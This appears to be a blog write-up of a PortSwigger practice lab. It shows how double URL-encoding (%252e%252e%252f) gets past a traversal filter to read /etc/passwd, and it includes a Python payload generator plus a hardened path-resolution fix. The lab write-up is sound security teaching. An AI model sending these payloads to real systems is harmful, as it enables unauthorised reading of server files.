apsyleg · 1 min read
#portswigger #path-traversal #web-security
File Path Traversal: Bypassing Traversal Stripping with Double URL-Encoding
Lab
File path traversal, traversal sequences stripped with superfluous URL-decode · Practitioner
Solution
Given
This lab contains a path traversal vulnerability in the display of product images.
The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it.
To solve the lab, retrieve the contents of the /etc/passwd file.
Analysis and recon
Same as the previous lab, except that plain ../ sequences are now blocked, so we try URL-encoding: ../ → %2e%2e%2f. Because the server already URL-decodes the parameter once before the block check, a single encoding arrives at the filter as ../ and is rejected. Double encoding (../ → %2e%2e%2f → %252e%252e%252f) survives that first decode as %2e%2e%2f, which contains no ../ and passes the filter; the superfluous second decode then turns it back into ../ right before the path is used.
We try the payload with %2e%2e%2f first: blocked.
Then the double-encoded form: it works, and the image response returns the contents of /etc/passwd.
Final payload
GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
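To make the decode-filter-decode ordering concrete, here is an added model of the lab's pipeline (my own illustration, not PortSwigger's server code). It assumes a hypothetical image directory /var/www/images and a filter that rejects any input still containing ../ after the first decode; a payload generator produces the single- and double-encoded forms, and a hardened resolver shows the fix: decode once, canonicalise, and check the result stays inside the base directory.

```python
"""Model of a decode-then-filter-then-decode-again path check.

Added example for this write-up; it is not the lab's real code.
BASE_DIR and the filter details are assumptions for illustration.
"""
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/images"  # assumed, not taken from the lab


def encode_traversal(depth: int, target: str, rounds: int) -> str:
    """Build depth copies of ../ URL-encoded `rounds` times, then the target.

    rounds=1 -> %2e%2e%2f...   rounds=2 -> %252e%252e%252f...
    urllib.parse.quote never encodes '.', so the bytes are encoded by hand.
    """
    seq = "".join(f"%{ord(c):02x}" for c in "../")  # "%2e%2e%2f"
    for _ in range(rounds - 1):
        seq = seq.replace("%", "%25")  # encode the percent sign itself
    return seq * depth + target


def vulnerable_resolve(raw_value: str):
    """Mimic the lab: web server decodes once, app blocks ../,
    then the app performs a superfluous second decode before use.
    Returns the path that would be opened, or None if blocked."""
    once = unquote(raw_value)               # framework / web-server decode
    if "../" in once or "..\\" in once:
        return None                          # traversal sequence blocked
    twice = unquote(once)                    # the superfluous decode
    return posixpath.normpath(posixpath.join(BASE_DIR, twice))


def hardened_resolve(raw_value: str):
    """Fix: decode exactly once, canonicalise, then verify containment.
    No string blacklist; the check runs on the final resolved path."""
    once = unquote(raw_value)
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, once))
    if candidate != BASE_DIR and not candidate.startswith(BASE_DIR + "/"):
        return None                          # escaped the image directory
    return candidate


if __name__ == "__main__":
    single = encode_traversal(3, "etc/passwd", 1)
    double = encode_traversal(3, "etc/passwd", 2)
    for label, payload in (("single", single), ("double", double)):
        print(label, payload)
        print("  vulnerable ->", vulnerable_resolve(payload))
        print("  hardened   ->", hardened_resolve(payload))
```

Run it and the single-encoded payload is blocked by the vulnerable resolver while the double-encoded one resolves to /etc/passwd, exactly the behaviour observed in the lab; the hardened resolver never leaves /var/www/images for either form, because it compares the canonical path rather than searching the raw string for ../.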